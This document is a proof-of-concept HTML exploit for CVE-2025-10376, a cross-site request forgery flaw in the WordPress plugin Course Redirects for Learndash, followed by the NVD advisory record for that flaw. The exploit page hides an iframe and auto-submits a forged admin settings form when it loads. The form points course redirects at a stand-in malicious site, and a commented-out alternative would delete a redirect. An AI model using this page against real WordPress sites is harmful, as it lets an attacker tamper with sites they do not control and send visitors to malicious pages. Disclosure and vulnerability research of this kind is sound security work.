CVE-2025-10376

<!-- CVE-2025-10376 PoC - CSRF exploit for Course Redirects for Learndash plugin Target: WordPress sites with Course Redirects for Learndash plugin <= 0.4 Description: This PoC demonstrates how an unauthenticated attacker can modify plugin settings by tricking an authenticated administrator into visiting a malicious page. --> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Loading...</title> </head> <body> <!-- Hidden iframe-based CSRF PoC --> <iframe style="display:none" name="csrf-frame"></iframe> <form id="csrf-form" action="http://target-wordpress-site.com/wp-admin/admin.php?page=course-redirects-for-learndash" method="POST" target="csrf-frame"> <!-- Modify redirect settings - parameters may vary based on plugin version --> <input type="hidden" name="action" value="update_redirect" /> <input type="hidden" name="course_id" value="1" /> <input type="hidden" name="redirect_url" value="http://evil-site.com/malicious-page" /> <input type="hidden" name="redirect_type" value="301" /> <input type="hidden" name="submit" value="Save Changes" /> </form> <script> // Auto-submit the form when the page loads document.getElementById('csrf-form').submit(); </script> <!-- Alternative: Image-based CSRF for GET requests --> <!-- <img src="http://target-wordpress-site.com/wp-admin/admin.php?page=course-redirects-for-learndash&action=delete&course_id=1" style="display:none" /> --> </body> </html>

{"cve": {"id": "CVE-2025-10376", "sourceIdentifier": "[email protected]", "published": "2025-10-11T10:15:42.477", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Course Redirects for Learndash plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.4. This is due to missing nonce validation when processing form submissions on the settings page. This makes it possible for unauthenticated attackers to modify plugin settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/course-redirects-for-learndash/trunk/redirect_course.php#L76", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f04ef770-73d9-4940-9736-c214bf5137ba?source=cve", "source": "[email protected]"}]}}